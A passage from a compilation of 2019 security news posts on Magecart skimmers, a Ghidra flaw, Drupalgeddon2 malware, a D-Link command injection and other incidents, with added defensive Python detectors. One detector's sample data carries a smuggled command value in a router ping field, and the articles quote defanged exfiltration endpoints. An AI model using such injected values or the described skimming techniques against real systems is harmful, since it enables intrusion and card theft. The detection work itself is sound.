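        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)


def script_hosts(html, page_host):
    """Return (src, host) pairs; relative URLs resolve to the page host."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    out = []
    for src in parser.srcs:
        host = urlsplit(src).netloc.lower() or page_host
        out.append((src, host))
    return out


def unexpected_scripts(html, page_host, allowed_suffixes):
    """Scripts served from neither the page host nor an allowed domain."""
    flagged = []
    for src, host in script_hosts(html, page_host):
        allowed = host == page_host or any(
            host == suffix or host.endswith("." + suffix)
            for suffix in allowed_suffixes
        )
        if not allowed:
            flagged.append((src, host))
    return flagged


# Constructed checkout page; only the googleapis URL comes from the article.
CHECKOUT_HTML = """
<html><head>
<script src="/a/j/vnav.js"></script>
<script src="https://www.volusion.com/static/checkout.js"></script>
<script src="https://storage.googleapis.com/volusionapi/resources.js"></script>
<script>var inlineConfig = 1;</script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for src, host in unexpected_scripts(CHECKOUT_HTML,
                                        "sesamestreetlivestore.com",
                                        ["volusion.com"]):
        print("unexpected script host:", host, "<-", src)
```

The limitation is the one the article itself points at: resources.js was pulled in by vnav.js at runtime, not by a static tag, so the static parse is a first pass and the same allowlist should also be applied to the network requests a real browser makes while loading the checkout.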

“At its core, the additional code consists of two sections. The first section is reading the values entered at the Credit Card information fields and after a series of checks, it’s Base64 encoded along with serialization and simple shift operation, So that a simple Base64 deobfuscation would not reveal the data.” reads the post published by the researcher. “The second part of the script is responsible for reading that data stored and posting it to their primary server hxxps://volusion-cdn.com/analytics/beacon.”

Who is behind the attack?

The attackers’ TTPs suggest the involvement of one of the Magecart groups, that in the past already used public cloud storage to host their malicious scripts. 

In a report recently published by RiskIQ, the experts estimated that the group has impacted millions of users. RiskIQ reports a total of 2,086,529 instances of Magecart detections, most of them supply-chain attacks.

Twitter inadvertently used Phone Numbers collected for security for Ads

Twitter admitted having “inadvertently” used phone numbers and email addresses, collected for security purposes, for advertising.

Twitter apologized for having used phone numbers and email addresses, provided by users for security purposes, for advertising. According to the social media company, data used for account authentication was also matched against advertisers’ databases to improve the efficiency of ads.

“We recently discovered that when you provided an email address or phone number for safety or security purposes (for example, two-factor authentication) this data may have inadvertently been used for advertising purposes, specifically in our Tailored Audiences and Partner Audiences advertising system.” reads a post published by Twitter.

At the time of writing it is unclear the number of impacted Twitter users.

The company attempted to downplay the severity of the privacy incident highlighting that none of the user data was shared with partners outside the company.

The Twitter Tailored Audiences product allows advertisers to target ads to customers based on the advertiser’s own marketing lists that includes info such as email addresses or phone numbers. Partner Audiences allows advertisers to use the same Tailored Audiences features to target ads to audiences provided by third-party partners.

Twitter admitted that when an advertiser uploaded their marketing list, its staff may have matched the information included in these lists with data provided by its users to protect their accounts.

The root cause of the problem was addressed on September 17, 2019.

“We cannot say with certainty how many people were impacted by this, but in an effort to be transparent, we wanted to make everyone aware. No personal data was ever shared externally with our partners or any other third parties.” added Twitter.

“We’re very sorry this happened and are taking steps to make sure we don’t make a mistake like this again,”

Researchers discovered a code execution flaw in NSA GHIDRA

Security researchers discovered a code-execution vulnerability that affects versions through 9.0.4 of the Ghidra software reverse engineering (SRE) framework.

GHIDRA is a multi-platform reverse engineering framework that runs on major OSs (Windows, macOS, and Linux).

The framework was first mentioned in the CIA Vault 7 dump leaked in 2017. WikiLeaks obtained thousands of files allegedly originating from a CIA high-security network that detail CIA hacking techniques, tools, and capabilities. Digging through the huge trove of files, it is possible to find information about GHIDRA, a Java-based reverse engineering tool.

The NSA released the Ghidra suite in March; it can be used to find vulnerabilities and security holes in applications.

Ghidra is Apache 2.0-licensed and requires a Java runtime; it is available for download here. Of course, some fear the US agency may have introduced a backdoor in the suite, but the NSA has denied it.

A couple of weeks ago, security researchers discovered a vulnerability in the Ghidra tool, tracked as CVE-2019-16941, that could be exploited by an attacker to execute arbitrary code within the context of the affected application. The researchers discovered that the flaw could be exploited only when the experimental mode is enabled.

The vulnerability resides in the Read XML Files feature of Bit Patterns Explorer, an attacker could exploit it by using modified XML documents.

“NSA Ghidra through 9.0.4, when experimental mode is enabled, allows arbitrary code execution if the Read XML Files feature of Bit Patterns Explorer is used with a modified XML document.” reads the security advisory. “This occurs in Features/BytePatterns/src/main/java/ghidra/bitpatterns/info/FileBitPatternInfoReader.java. An attack could start with an XML document that was originally created by DumpFunctionPatternInfoScript but then directly modified by an attacker (for example, to make a java.lang.Runtime.exec call).”

The vulnerability has been rated as “critical severity” and received a CVSS score of 9.8.

The NSA attempted to downplay the severity of the flaw explaining that it is hard to exploit.

The good news is that the issue has been already fixed, a patch is available for those who build Ghidra themselves from the master branch.

The Ghidra 9.1 release, that is currently in beta testing, will also address the flaw.

MS October 2019 Patch Tuesday updates address 59 flaws

Microsoft October 2019 Patch Tuesday addressed a total of 59 vulnerabilities, 9 of which are rated as critical and 49 as important.

The tech giant released its October 2019 Patch Tuesday security updates to address a total of 59 vulnerabilities in Windows operating systems and other software, 9 of which are rated as ‘critical’, 49 are ‘important’, and one ‘moderate’.

None of the vulnerabilities addressed by Microsoft were exploited by attackers in the wild or publicly known before the release.

Microsoft addressed two critical remote code execution flaws, tracked as CVE-2019-1238 and CVE-2019-1239, in the VBScript engine; both are tied to the way VBScript handles objects in memory. An attacker could exploit the flaws to corrupt memory and execute arbitrary code in the context of the current user.

An attacker could trigger the flaws by tricking the victims into visiting a specially crafted website through Internet Explorer.

The attacker could also exploit these flaws using an application or Microsoft Office document that embeds an ActiveX control marked ‘safe for initialization’ that leverages the Internet Explorer rendering engine.

Microsoft addressed three critical memory corruption flaws in the Chakra scripting engine that could lead to remote code execution. The vulnerabilities affect the way Chakra scripting engine handles objects in memory in Microsoft Edge.

Microsoft also addressed a reverse RDP attack: a critical remote code execution issue in the Windows built-in Remote Desktop Client application that an attacker could exploit to compromise client computers connecting to a malicious RDP server.

The attack scenario sees threat actors tricking victims into connecting to a malicious RDP server.

The October 2019 Patch Tuesday security updates also addressed two NTLM authentication vulnerabilities, tracked as CVE-2019-1166 and CVE-2019-1338, that could be exploited by attackers to bypass the MIC (Message Integrity Code) protection on NTLM authentication.

“A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection. An attacker who successfully exploited this vulnerability could gain the ability to downgrade NTLM security features.” reads the security advisory for CVE-2019-1166.

“To exploit this vulnerability, the attacker would need to tamper with the NTLM exchange. The attacker could then modify flags of the NTLM packet without invalidating the signature.”

The full list of vulnerabilities addressed with the release of October 2019 Patch Tuesday updates is available here.

Experts found a link between a Magecart group and Cobalt Group

Researchers from MalwareBytes and HYAS Threat Intelligence linked one of the hacking groups under the Magecart umbrella to the notorious Cobalt cybercrime Group.

Hacker groups under the Magecart umbrella continue to target organizations worldwide to steal payment card data with so-called software skimmers. Security firms have monitored the activities of at least a dozen groups since 2010.

According to a joint report published by RiskIQ and FlashPoint, some groups are more advanced than others, in particular, the gang tracked as Group 4 appears to be very sophisticated.

The list of victims of the groups is long and includes several major platforms such as British Airways, Newegg, Ticketmaster, MyPillow and Amerisleep, and Feedify.

Millions of Magecart instances were detected over time, security experts discovered tens of software skimming scripts.

Researchers at RiskIQ estimate that the group has impacted millions of users. RiskIQ reports a total of 2,086,529 instances of Magecart detections, most of them are supply-chain attacks.

The same team of experts has determined that the Magecart infrastructure is vast, with 573 known C2 domains, and 9,189 hosts observed loading C2 domains. 

A new joint report published by researchers at Malwarebytes and HYAS Threat Intelligence reveals that one of the groups under the Magecart umbrella is linked to the Cobalt Group.

The experts found a link between the Magecart Group 4 and the Cobalt cybercrime Gang, such as patterns in the email addresses used to register domains used in Magecart operations.

“One group that caught our interest is Group 4, which is one of the more advanced cybercriminal organizations. While working jointly with security firm HYAS, we found some interesting patterns in the email addresses used to register domains belonging to Magecart matching those of a sophisticated threat group known as Cobalt Group, aka Cobalt Gang or Cobalt Spider.” reads the blog post published by MalwareBytes.

The Cobalt crime gang is a Russian hacking crew active since at least 2016 that has targeted banks worldwide; the group leveraged spear-phishing emails, spoofed to appear as coming from financial institutions or a financial supplier/partner, to compromise target systems.

Experts pointed out that Group 4, unlike other Magecart groups, uses both client-side and server-side skimmers.

One of the client-side skimmers analyzed by the researchers was disguised as the jquery.mask.js plugin; the attackers appended the malicious code at the end of the script and protected it with several layers of obfuscation.

Experts also analyzed a server-side skimmer, a PHP script that was mistakenly served as JavaScript instead.

“This little code snippet looks for certain keywords associated with a financial transaction and then sends the request and cookie data to the exfiltration server at secureqbrowser[.]com. An almost exact copy of this script was described by Denis Sinegubko of Sucuri in his post Autoloaded Server-Side Swiper.” continues the report.

Experts noticed that in both attacks, the domains were registered to robertbalbarran(at)protonmail.com.

The analysis of the exfiltration gates allowed the researchers to link them to other registrant emails and identify a pattern for the format of email addresses ([first name][initial][last name]).

Experts noticed that the Cobalt Group has also switched to this naming convention.

“A small shift from one of their previous conventions of [firstname],[lastname], [fournumbers] (overwhelmingly using protonmail accounts, with a handful of tutanota/keemail.me email accounts) changed to the above-noted convention of [firstname], [initial], [lastname] again using the same email services and registrars, and notably the same use of privacy protection services.” the experts continue.

Further investigation allowed the experts to discover that 10 of the seemingly separate accounts reused only two different IP addresses, even over weeks and months between registrations.

One email address, petersmelanie(at)protonmail.com, was used to register 23 domains, including one involved in a phishing campaign leveraging the CVE-2017-0199 flaw and other attacks against Oracle and various banks.
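The registrant pivot described above, turned into a small threat-intel routine: classify registrant e-mail addresses by the two naming conventions the report names and cluster them by the IP address reused across registrations. This is an added example, not code from Malwarebytes or HYAS; the records below are constructed (documentation IP ranges, invented domains), except for the two addresses the report itself names, and the letters-only regex is an assumed proxy for the [firstname][initial][lastname] convention since no name dictionary is used.

```python
"""Pivot on domain-registration metadata: group registrant e-mails by naming
convention and by registration IP reuse.  Added example on constructed data."""
import re
from collections import defaultdict

# Privacy-oriented providers the report says the actors favoured.
PRIVACY_MAIL = {"protonmail.com", "tutanota.com", "keemail.me"}

# Old convention: [firstname][lastname][fournumbers]; new: [firstname][initial][lastname].
# The new-style check is a heuristic (letters only, no digits or separators).
OLD_STYLE = re.compile(r"^[a-z]+[0-9]{4}$")
NEW_STYLE = re.compile(r"^[a-z]{6,}$")


def classify(email: str) -> str:
    """Label an address as old-convention, new-convention or other."""
    local, _, domain = email.lower().partition("@")
    if domain not in PRIVACY_MAIL:
        return "other"
    if OLD_STYLE.match(local):
        return "old-convention"
    if NEW_STYLE.match(local):
        return "new-convention"
    return "other"


def cluster_by_ip(records, min_accounts=2):
    """Return {ip: sorted emails} for IPs reused by at least min_accounts distinct e-mails."""
    by_ip = defaultdict(set)
    for rec in records:
        by_ip[rec["reg_ip"]].add(rec["email"].lower())
    return {ip: sorted(emails) for ip, emails in by_ip.items() if len(emails) >= min_accounts}


def suspicious_registrants(records):
    """E-mails matching either convention that share a registration IP with another such e-mail."""
    flagged = set()
    for emails in cluster_by_ip(records).values():
        styled = [e for e in emails if classify(e) != "other"]
        if len(styled) >= 2:
            flagged.update(styled)
    return sorted(flagged)


# Constructed WHOIS-style records; the two protonmail addresses are those named in the report.
SAMPLE_RECORDS = [
    {"domain": "secureqbrowser[.]com", "email": "robertbalbarran@protonmail.com", "reg_ip": "192.0.2.10"},
    {"domain": "example-a.test", "email": "petersmelanie@protonmail.com", "reg_ip": "192.0.2.10"},
    {"domain": "example-b.test", "email": "johnqpublic@tutanota.com", "reg_ip": "198.51.100.5"},
    {"domain": "example-c.test", "email": "janesmith4821@protonmail.com", "reg_ip": "198.51.100.5"},
    {"domain": "example-d.test", "email": "alice@corp.example", "reg_ip": "203.0.113.77"},
    {"domain": "example-e.test", "email": "bob.jones@gmail.com", "reg_ip": "203.0.113.77"},
]

if __name__ == "__main__":
    for ip, emails in cluster_by_ip(SAMPLE_RECORDS).items():
        print(ip, emails)
    print("flagged:", suspicious_registrants(SAMPLE_RECORDS))
```

The IP clustering is the stronger signal: the naming regex alone would also flag ordinary users of these mail providers, so the routine only reports addresses that both fit a convention and share a registration IP with another such address.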

“Based on their historical ties to the space, and the entrance of sophisticated actor groups such as FIN6 and others, it’s logical to conclude that Cobalt Group would also enter this field and continue to diversify their criminal efforts against global financial institutions,” concludes the report. “The use of both client-side and server-side skimmers and the challenges this poses in identifying Magecart compromises by advanced threat groups necessitates the ongoing work of industry partners to help defend against this significant and growing threat.”

Pierluigi Paganini

(SecurityAffairs – Magecart, Cobalt group)

The post Experts found a link between a Magecart group and Cobalt Group appeared first on Security Affairs.

Developer hacked back Muhstik ransomware crew and released keys

One of the victims of the Muhstik ransomware gang, who initially paid the ransom, decided to hack back the crooks and released their decryption keys.

Tobias Frömel is a German software developer who was a victim of the Muhstik ransomware. Frömel initially paid the ransom to decrypt his files, but later decided to get his revenge on the crooks.

The expert hacked the server used by the Muhstik ransomware gang and released the decryption keys for all the victims of the group.

Muhstik is a piece of ransomware that was first detected in the wild in late September while targeting QNAP network-attached storage (NAS) devices.

Attackers first get access to the NAS devices through brute-force attacks on the built-in phpMyAdmin service, then encrypt their content and append the “.muhstik” extension to their filenames.

This ransomware targets network-attached storage (NAS) devices made by the Taiwanese hardware vendor QNAP. The gang behind the Muhstik ransomware is brute-forcing QNAP NAS devices that use weak passwords for the built-in phpMyAdmin service.

“The Muhstik ransomware is reportedly being used to target QNAP NAS devices. Devices using weak SQL server passwords and running phpMyAdmin may be more vulnerable to attacks.” states the security advisory published by QNAP.

“We strongly recommend that users act immediately to protect their data from possible malware attacks.”

The developer published on Pastebin the 2,858 decryption keys found on the hacked server and clarified that he was aware that the hack back is not legal.

“hope you all got that decrypter execution file, if not i still have it and yeah, I know it was not legal from me,” wrote the researcher. “I’m not the bad guy here.”

Frömel also published a decrypter that could be used by the victims of the Muhstik ransomware to unlock their files.

In the meantime, Frömel has been busy notifying Muhstik victims on Twitter about the decrypter’s availability, advising users against paying the ransom.

According to ZDNet, which first reported the news, Frömel notified authorities and also provided information to track down members of the Muhstik gang.

This case highlights the importance of working with the authorization of law enforcement before hacking back.

Pierluigi Paganini

(SecurityAffairs – Muhstik ransomware, hacking)


Users reported problems with patches for CVE-2019-1367 IE zero-day

Patches for Internet Explorer Zero-Day Causing Problems for Many Users

Microsoft has released a new set of patches for a recently fixed zero-day flaw in Internet Explorer, after users reported problems with the previous patch.

On September 23, Microsoft released an out-of-band patch to address a zero-day memory corruption flaw in Internet Explorer (CVE-2019-1367) that has been exploited in attacks in the wild.

The vulnerability resides in Internet Explorer’s scripting engine and affects the way objects in memory are handled.

An attacker could exploit the vulnerability to gain the same privileges as the current user; the impact is critical if the current user has administrative privileges.

In order to exploit the vulnerability, an attacker could host a specially crafted website designed to trigger the flaw when Internet Explorer users visit it. The attacker only has to trick victims into visiting the malicious website, for example by sending them a link via email, or by sending a malicious email attachment (HTML file, PDF file, Microsoft Office document) that supports embedding scripting engine content.

“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the security advisory published by Microsoft. “An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. “

On October 3, Microsoft released another set of patches for the zero-day vulnerability, because some users experienced printing issues following the installation of the patches initially released by the tech giant.

“To address a known printing issue customers might experience after installing the Security Updates or IE Cumulative updates that were released on September 23, 2019 for CVE-2019-1367, Microsoft is releasing new Security Updates, IE Cumulative Updates, and Monthly Rollup updates for all applicable installations of Internet Explorer 9, 10, or 11 on Microsoft Windows,” reads the Microsoft Security Update Releases notification email sent to users.

Several users reported that the cumulative update released by Microsoft is also causing boot issues and crashes of the Start menu.

Microsoft pointed out that the IE Cumulative updates are separate from the October Patch Tuesday updates which are scheduled for October 8.

Pierluigi Paganini

(SecurityAffairs – CVE-2019-1367, hacking)


Hackers continue to exploit the Drupalgeddon2 flaw in attacks in the wild

Researchers from Akamai uncovered a new campaign targeting the Drupalgeddon2 vulnerability to deliver malware.

The popular security expert Larry W. Cashdollar from Akamai has uncovered a new campaign targeting the popular Drupalgeddon2 vulnerability (CVE-2018-7600) to deliver malware.

Drupalgeddon2 is a “highly critical” vulnerability that affects Drupal 7 and 8 core; it could be exploited by an attacker to run arbitrary code on the CMS core component and take over a website just by accessing a URL.

The Drupal development team fixed the vulnerability in March 2018, but hackers continue to target Drupalgeddon2 in the wild.

The campaign recently discovered by Cashdollar sees the attackers attempting to run malicious code embedded in a .gif file.

The expert explained that the campaign is currently not widespread, but it is targeting a broad range of high-profile websites.

“I observed an attack that is designed to run code that is embedded inside a .gif file. While embedding code in image file isn’t a new attack method, I haven’t seen this method in quite some time.” reads the analysis published by Cashdollar.

“The attack traffic doesn’t appear to be widespread at this time, nor does it appear to be specifically targeting a single industry vertical. Currently, the attack traffic seems to be directed towards a random assortment of high profile websites. The code I will be examining is embedded in the file index.inc.gif, which appears to be hosted on a compromised bodysurfing website located in Brazil.”

One of the .gif files analyzed by the expert was hosted on a compromised bodysurfing website located in Brazil. The file contained obfuscated PHP code designed to decode base64-encoded malware that the threat actors had stored in a variable.

“The commands clean up any previous installations and then replace any .htaccess configurations with versions that have less restrictive settings.” continues the analysis. “Then two different files are downloaded and then executed. The first, index.inc.gif, contains obfuscated PHP code. It contains a GIF header, but the rest of the file is PHP code obscured using gzip compression, rot13, and base64 encoding.”

The malware supports several functions, such as scanning local files for credentials, sending email with the discovered credentials, replacing the local .htaccess file, displaying MySQL my.cnf configuration files, executing a remote file that is gz-compressed and base64-encoded, showing system information, renaming files, uploading files, and launching a web shell.
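A triage helper for the kind of file the analysis describes: a GIF header followed by PHP code wrapped in gzip compression, rot13 and base64. This is an added example, not Akamai's or Cashdollar's code. The sample file is constructed here with a benign stand-in payload, and the layer order (PHP's str_rot13(base64_encode(gzdeflate(code)))) is an assumption about how the three named layers were stacked; PHP's gzinflate() consumes raw DEFLATE, which is why the decoder uses negative zlib window bits.

```python
"""Detect a GIF/PHP polyglot and peel rot13 -> base64 -> raw DEFLATE off its payload.
Added example; the sample file and its layer order are constructed assumptions."""
import base64
import codecs
import re
import zlib

GIF_MAGICS = (b"GIF87a", b"GIF89a")
PHP_MARKERS = (b"<?php", b"eval(", b"gzinflate(", b"base64_decode(", b"str_rot13(")
# Single-quoted argument handed to str_rot13(...) inside a loader stub.
ROT13_ARG = re.compile(rb"str_rot13\(\s*'([A-Za-z0-9+/=]+)'\s*\)")


def is_polyglot(data: bytes) -> bool:
    """True if the file starts like a GIF but also carries PHP code markers."""
    return data.startswith(GIF_MAGICS) and any(m in data for m in PHP_MARKERS)


def unwrap(blob: bytes) -> bytes:
    """Reverse str_rot13 -> base64_decode -> gzinflate (raw DEFLATE, wbits=-15)."""
    step1 = codecs.encode(blob.decode("ascii"), "rot13").encode("ascii")
    step2 = base64.b64decode(step1, validate=True)
    return zlib.decompress(step2, wbits=-15)


def extract_payloads(data: bytes) -> list:
    """Return every decoded payload found behind a str_rot13('...') argument."""
    return [unwrap(m.group(1)) for m in ROT13_ARG.finditer(data)]


# --- constructed sample: benign stand-in for the real payload ---
HIDDEN_CODE = b"<?php echo 'constructed stand-in for the hidden script body'; ?>"


def wrap(code: bytes) -> bytes:
    """Mirror of unwrap(): gzdeflate -> base64_encode -> str_rot13 (assumed order)."""
    comp = zlib.compressobj(level=9, wbits=-15)      # raw DEFLATE, like PHP gzdeflate()
    raw = comp.compress(code) + comp.flush()
    b64 = base64.b64encode(raw)
    return codecs.encode(b64.decode("ascii"), "rot13").encode("ascii")


def build_sample() -> bytes:
    """A few GIF header bytes followed by a PHP loader stub carrying the wrapped code."""
    header = b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00"
    stub = b"<?php eval(gzinflate(base64_decode(str_rot13('" + wrap(HIDDEN_CODE) + b"')))); ?>"
    return header + b"\n" + stub


if __name__ == "__main__":
    sample = build_sample()
    print("polyglot:", is_polyglot(sample))
    for payload in extract_payloads(sample):
        print(payload.decode(errors="replace"))
```

On a web server, `is_polyglot()` is cheap enough to run over every upload or over files under the document root whose extension says image but whose content says otherwise; real loaders vary the layer order and function names, so treat the regex as a starting point and extend it from the samples you actually recover.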

The campaign also delivers a piece of malware stored in a .txt file containing a Perl script that leverages Internet Relay Chat (IRC) for command and control (C&C) communication. The malware implements common RAT features and is also able to launch distributed denial-of-service (DDoS) attacks.

The malware also implements functionalities to gather information from the local system and to control infected systems, it also supports a SQL flood command. The fact that attackers are still exploiting the Drupalgeddon2 flaw highlights the importance of patch management in enterprises.

“Critical vulnerabilities will be targeted, even if their public disclosure date is over a year old. When the vulnerability’s exploitation is simple, which is the case with Drupalgeddon2, attackers will automate the process of scanning, exploitation, and infection when there are poorly maintained and forgotten systems.” Cashdollar concludes. “This creates a problem for enterprise operations and web administrators, as these old forgotten installs are often connected to other critical systems — creating a pivot point on the network.”

“Maintaining patches in a timely fashion, as well as properly decommissioning servers if they’re no longer being used is the best preventative measure that administrators and security teams can take.”

Pierluigi Paganini

(SecurityAffairs – Drupalgeddon2, hacking)


D-Link router models affected by remote code execution issue that will not be fixed

Researchers at Fortinet’s FortiGuard Labs have publicly disclosed a critical remote code execution vulnerability affecting some models of D-Link routers. 

Security experts at Fortinet’s FortiGuard Labs disclosed a remote code execution vulnerability tracked as CVE-2019-16920. The vulnerability is an unauthenticated command injection issue that was discovered in September 2019. The flaw has received a CVSS v3.1 base score of 9.8 and a CVSS v2.0 base score of 10.0.

The bad news for users is that the vendor will not address it because it affects discontinued products.

According to Fortinet, the vulnerability impacts D-Link firmware in the DIR-655, DIR-866L, DIR-652, and DHP-1565 router families.


“In September 2019, Fortinet’s FortiGuard Labs discovered and reported an unauthenticated command injection vulnerability (FG-VD-19-117/CVE-2019-16920) in D-Link products that could lead to Remote Code Execution (RCE) upon successful exploitation. We rated this as a critical issue since the vulnerability can be triggered remotely without authentication.” reads the security advisory published by Fortinet.

The vulnerability could be exploited by an attacker sending arbitrary input to a “PingTest” gateway interface to achieve command injection.

“The vulnerability begins with a bad authentication check. To see the problem in action, we start at the admin page and then perform a login action.” continues the advisory. “Here, we implement the POST HTTP Request to “apply_sec.cgi” with the action ping_test. We then perform the command injection in ping_ipaddr. Even if it returns the login page, the action ping_test is still performed – the value of ping_ipaddr will execute the “echo 1234” command in the router server and then send the result back to our server. “

The experts discovered that it is possible to execute code remotely, even without the necessary privileges, due to a bad authentication check.
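Because no patch is coming for these models, the practical defence is to detect the pattern described above at a reverse proxy or WAF in front of the management interface and to keep that interface off the internet. The following is an added detection example, not Fortinet's or D-Link's code, run over constructed request records; the record fields (`path`, `params`, `authenticated`, `src`) are an assumption about what a proxy that logs POST parameters would expose, and the `echo 1234` value is the one the advisory quotes.

```python
"""Flag apply_sec.cgi ping_test requests whose ping_ipaddr is not a plain IP or
hostname, or that arrive without an authenticated session.  Added example on
constructed request records."""
import ipaddress
import re

HOSTNAME = re.compile(r"^(?=.{1,253}$)[A-Za-z0-9-]{1,63}(\.[A-Za-z0-9-]{1,63})*$")
SHELL_META = re.compile(r"[;&|`$(){}<>\n\\]")


def is_ping_target_valid(value: str) -> bool:
    """A legitimate ping target is an IP literal or a plain hostname, nothing else."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(HOSTNAME.match(value))


def assess_request(req: dict) -> list:
    """Return the reasons a request looks like abuse of the flaw (empty list = benign)."""
    reasons = []
    if not req.get("path", "").endswith("/apply_sec.cgi"):
        return reasons
    params = req.get("params", {})
    if params.get("action") != "ping_test":
        return reasons
    target = params.get("ping_ipaddr", "")
    if SHELL_META.search(target):
        reasons.append("shell metacharacters in ping_ipaddr")
    elif not is_ping_target_valid(target):
        reasons.append("ping_ipaddr is not an IP or hostname")
    if not req.get("authenticated", False):
        # The advisory notes the action runs even when the login page is returned.
        reasons.append("ping_test without an authenticated session")
    return reasons


def find_suspicious(requests):
    """(source address, reasons) for every request that raised at least one reason."""
    return [(r["src"], assess_request(r)) for r in requests if assess_request(r)]


# Constructed records; documentation IP ranges only.
SAMPLE_REQUESTS = [
    {"src": "198.51.100.4", "method": "POST", "path": "/apply_sec.cgi", "authenticated": True,
     "params": {"action": "ping_test", "ping_ipaddr": "192.0.2.1"}},
    {"src": "203.0.113.9", "method": "POST", "path": "/apply_sec.cgi", "authenticated": False,
     "params": {"action": "ping_test", "ping_ipaddr": "192.0.2.1; echo 1234"}},
    {"src": "203.0.113.10", "method": "POST", "path": "/apply_sec.cgi", "authenticated": False,
     "params": {"action": "ping_test", "ping_ipaddr": "gateway.lan"}},
    {"src": "198.51.100.5", "method": "GET", "path": "/index.html", "authenticated": False,
     "params": {}},
]

if __name__ == "__main__":
    for src, reasons in find_suspicious(SAMPLE_REQUESTS):
        print(src, "->", "; ".join(reasons))
```

The second check matters as much as the first: a well-formed hostname sent by an unauthenticated client still exercises the broken authentication path, so an alert on any unauthenticated `ping_test` catches probing that a metacharacter filter alone would miss.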

The researchers reported the vulnerability to D-Link on September 22; the vendor acknowledged the issue the day after, but three days later confirmed that no patch will be released because the products are at End of Life (EOL).

Below is the disclosure timeline:

  • 22 September 2019: FortiGuard Labs reported the vulnerability to D-Link.
  • 23 September 2019: D-Link confirmed the vulnerability.
  • 25 September 2019: D-Link confirmed these products are EOL.
  • 3 October 2019: Public disclosure of the issue and advisory released.

Pierluigi Paganini

(SecurityAffairs – routers, hacking)


US will help Baltic states to secure baltic energy grid

The United States and the Baltic states announced cooperation to protect the Baltic energy grid from cyber attacks as they disconnect from the Russian electricity grid.

The US and the Baltic states agreed to cooperate to protect the Baltic energy grid from cyber attacks as the latter disconnect from the Russian electricity grid.

US Energy Secretary Rick Perry and his Lithuanian, Latvian and Estonian counterparts announced the cooperation for the protection of the Baltic energy grid against cyber attacks in this “critical moment.”

“We see a crucial role that US could play in assisting the Baltic States with strategic and technical support,” reads a joint declaration signed by the officials in the Lithuanian capital Vilnius.

The three states joined both the European Union and NATO in 2004, but they are still part of a power grid controlled by Russia. The three countries will be integrated into the European energy grid by 2025, without depending on the Russian grid.

Lithuanian critical infrastructure, and in particular, organizations in the energy sector, are privileged targets of cyber attacks.

In May 2017, a wave of “exploratory” cyber attacks targeted the energy networks of the Baltic states. The attacks raised concerns that foreign states could disable the energy networks in the region.

Experts suspected the involvement of a Russian state actor due to the strategic interest of Russia in the states that are on the political front line between Russia and the West.

“Suspected Russia-backed hackers have launched exploratory cyber attacks against the energy networks of the Baltic states, sources said, raising security concerns inside the West’s main military alliance, NATO.” reported the Reuters agency, “The Baltics are locked into Russia’s power network but plan to synchronize their grids with the EU.”

NATO experts and cybersecurity researchers believe hackers were testing the Baltic energy networks for weaknesses.

Now Lithuania has confirmed it is looking for US technology firms to prevent attacks on energy control systems that could disrupt energy supplies.

“Energy minister Zygimantas Vaiciunas said the Baltic ministers also agreed with Perry to set up a cooperation platform for cyber security experts from all four countries within the next six months.” reports AFP.

Perry is promoting US liquefied natural gas (LNG) exports to Europe; both Lithuania and Poland have already begun importing it.

“We hope that all the citizens of Europe recognize that we certainly look at this (US LNG exports) as a great opportunity to bring more freedom to the marketplace, more competition to the marketplace,” Perry told reporters in Vilnius.

Pierluigi Paganini

(SecurityAffairs – Baltic Energy Grid, hacking)


Data from Sephora and StreetEasy data breaches added to HIBP

The popular data breach notification service Have I Been Pwned? (HIBP) has added the stolen data from the StreetEasy and Sephora data incidents.

Have I Been Pwned? (HIBP), the popular service that allows users to check whether their personal data has been compromised in data breaches, has added the stolen data from the StreetEasy and Sephora data incidents.

Users can check whether their data has been exposed in the StreetEasy and Sephora data breaches.

The StreetEasy data breach took place in mid-2016 and exposed 988k records that included names, usernames, email addresses and SHA-1 password hashes. The data has been available for sale in the cybercrime underground since February. In February, the hacker Gnosticplayers offered a third round of databases containing millions of hacked accounts from unreported data breaches, including StreetEasy (real estate) with 990,000 records.

“In approximately June 2016, the real estate website StreetEasy suffered a data breach. In total, 988k unique email addresses were included in the breach alongside names, usernames and SHA-1 hashes of passwords, all of which appeared for sale on a dark web marketplace in February 2019. The data was provided to HIBP by a source who requested it be attributed to “JimScott.Sec@protonmail.com”.” reads HIBP.

HIBP also included data from a data breach suffered by Sephora Southeast Asia in January 2017 that exposed data for 780,073 customers, including customers’ dates of birth, email addresses, ethnicities, genders, names, and physical attributes.

“In approximately January 2017, the beauty store Sephora suffered a data breach. Impacting customers in South East Asia, Australia and New Zealand, 780k unique email addresses were included in the breach alongside names, genders, dates of birth, ethnicities and other personal information. The data was provided to HIBP by a source who requested it be attributed to “JimScott.Sec@protonmail.com”.” reads HIBP.

Data from the Sephora data breach has also been seen for sale on hacker forums.

Users impacted by the data breaches should also change their passwords on every other site where they reused the same credentials.

Pierluigi Paganini

(SecurityAffairs – StreetEasy, data breach)


PoS malware infections impacted four restaurant chains in the U.S.

Four restaurant chains in the U.S. disclosed payment card theft via PoS malware that took place over the summer.

Four restaurant chains in the United States disclosed security breaches that impacted their payment systems over the summer; crooks used PoS malware to steal customers’ payment card data.

The restaurant chains are McAlister’s Deli, Moe’s Southwest Grill, Schlotzsky’s, and Hy-Vee, all of which confirmed the presence of PoS malware at certain locations.

Moe’s, McAlister’s and Schlotzsky’s are owned by Focus Brands; the fact that they simultaneously disclosed the payment card breaches suggests that attackers were able to compromise infrastructure shared by the brands.

The three restaurant chains confirmed that hackers compromised the payment systems in a period between April 29, 2019 and July 22, 2019.

“A thorough investigation is being conducted and is nearly complete. It appears that unauthorized code designed to copy payment card data from cards used in person was installed in certain corporate and franchised restaurants at different times over the general period of April 29, 2019 to July 22, 2019.” reads an excerpt of a data breach notification published by the three brands.

Only Schlotzsky’s reported that the attacks began on April 11, 2019; the other two confirmed that attacks started on April 29.

